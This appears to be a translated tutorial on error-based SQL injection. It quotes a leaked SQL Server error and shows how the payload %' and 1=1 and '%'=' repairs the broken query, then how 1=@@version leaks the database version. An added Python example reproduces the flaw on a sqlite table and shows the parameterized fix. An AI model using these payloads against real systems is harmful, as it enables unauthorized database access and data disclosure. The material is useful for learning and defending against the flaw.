Using an always-true condition to perform SQL injection
Q: What do you do when you hit an SQL injection point that throws a database error?
1. First, copy down the relevant part of the statement from the error:
SELECT @Total=COUNT(1) FROM (select * from (select *, ISNULL((select MAX(FOperateTime) from EAWP_Administration..TB_XZSQ_ProcInsOperateRecord where FInactivateDate is null and FOperateNO='50237414' and FProcInsID =a.FProcInsID),a.FLastUpdateDate) as ArrivedDate from EAWP_Administration..TB_XZSQ_Apply a where FInactivateDate is null and (FProcStatus=2 or FProcStatus=4) and FCreateBy='50237414') l where 1=1 AND FFormSubTitle LIKE '%B'%') T SELECT * FROM ( SELECT ROW_NUMBER() OVER (ORDER BY FProcStatus ASC,FCreationDate DESC) AS RowNumber,* FROM ( select * from (select *, ISNULL((select MAX(FOperateTime) from EAWP_Administration..TB_XZSQ_ProcInsOperateRecord where FInactivateDate is null and FOperateNO='50237414' and FProcInsID =a.FProcInsID),a.FLastUpdateDate) as ArrivedDate from EAWP_Administration..TB_XZSQ_Apply a where FInactivateDate is null and (FProcStatus=2 or FProcStatus=4) and FCreateBy='50237414') l where 1=1 AND FFormSubTitle LIKE '%B'%' ) AS N ) AS A WHERE A.RowNumber BETWEEN 1 AND 8 at System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction) at System.Data.SqlClient.TdsParser.ThrowExceptionAndWarning(TdsParserStateObject stateObj, Boolean callerHasConnectionLock, Boolean asyncClose) at System.Data.SqlClient.TdsParser.TryRun(RunBehavior runBehavior, SqlCommand cmdHandler, SqlDataReader dataStream, BulkCopySimpleResultSet bulkCopyHandler, TdsParserStateObject stateObj, Boolean& dataReady) at System.Data.SqlClient.SqlDataReader.TryConsumeMetaData() at System.Data.SqlClient.SqlDataReader.get_MetaData() at System.Data.SqlClient.SqlCommand.FinishExecuteReader(SqlDataReader ds, RunBehavior runBehavior, String resetOptionsString) at ...... (a very long SQL statement follows)
2. How do you approach such a complex statement? Simplify it to its skeleton so it is easier to analyze:
SELECT * FROM (select * from xxx where 1=1 AND F LIKE '%B'%') ...... (the rest is long and can be ignored)
Now let's look at how to inject.
Using an always-true condition to perform SQL injection:
(Without an always-true condition, a payload such as ' and 1=@@version+-- breaks the logic of the whole statement when the query is this complex: the query fails to execute and you never get the version.)
1. What if the statement is very complex? Reduce it to the one below so the noise does not get in the way:
SELECT * FROM (select * from xxx where 1=1 AND F LIKE '%B%')
2. Insert the payload %' and 1=1 and '%'=' ; the statement then concatenates cleanly and no longer errors:
SELECT * FROM (select * from xxx where 1=1 AND F LIKE '%%' and 1=1 and '%'='%')
3. Now make something happen: change 1=1 to 1=@@version. The "true" becomes "false" (comparing the integer 1 with the @@version string forces a conversion that fails), so the database raises an error that exposes the version:
SELECT * FROM (select * from xxx where 1=1 AND F LIKE '%%' and 1=@@version and '%'='%')
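The root cause in the query above is that the search term is pasted straight into the LIKE pattern. The following is an added example, not code from the original post: it reproduces the concatenation bug and the always-true payload against a constructed sqlite table (standing in for TB_XZSQ_Apply, since sqlite runs offline) and shows the parameterized form that neutralizes it. Table and row contents are made up.

```python
import sqlite3

# Constructed sample rows standing in for TB_XZSQ_Apply (FFormSubTitle, FProcStatus).
ROWS = [
    ("Budget 2023", 2),
    ("Travel request", 4),
    ("Badge renewal", 2),
    ("B'Day party", 4),
]

def make_db():
    """In-memory sqlite table used as a stand-in for the SQL Server table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE apply (FFormSubTitle TEXT, FProcStatus INTEGER)")
    conn.executemany("INSERT INTO apply VALUES (?, ?)", ROWS)
    return conn

def search_concat(conn, term):
    """Vulnerable: the search term is spliced into the SQL text, as in the page's query.
    A lone quote breaks the statement (the error seen above); the payload
    %' and 1=1 and '%'='  repairs the syntax but turns the filter into a tautology."""
    sql = ("SELECT * FROM (SELECT * FROM apply WHERE 1=1 "
           "AND FFormSubTitle LIKE '%" + term + "%')")
    return conn.execute(sql).fetchall()

def search_param(conn, term):
    """Hardened: the term is bound as a parameter, so it can never change the
    statement's structure; % and _ are escaped so they match literally."""
    escaped = (term.replace("\\", "\\\\")
                   .replace("%", "\\%")
                   .replace("_", "\\_"))
    sql = ("SELECT * FROM (SELECT * FROM apply WHERE 1=1 "
           "AND FFormSubTitle LIKE ? ESCAPE '\\')")
    return conn.execute(sql, ("%" + escaped + "%",)).fetchall()

def concat_raises(conn, term):
    """True if the vulnerable version throws a SQL syntax error for this input."""
    try:
        search_concat(conn, term)
        return False
    except sqlite3.OperationalError:
        return True
```

With the payload from the post, search_concat returns every row (the WHERE clause became always-true) while search_param returns none, because no title literally contains that string.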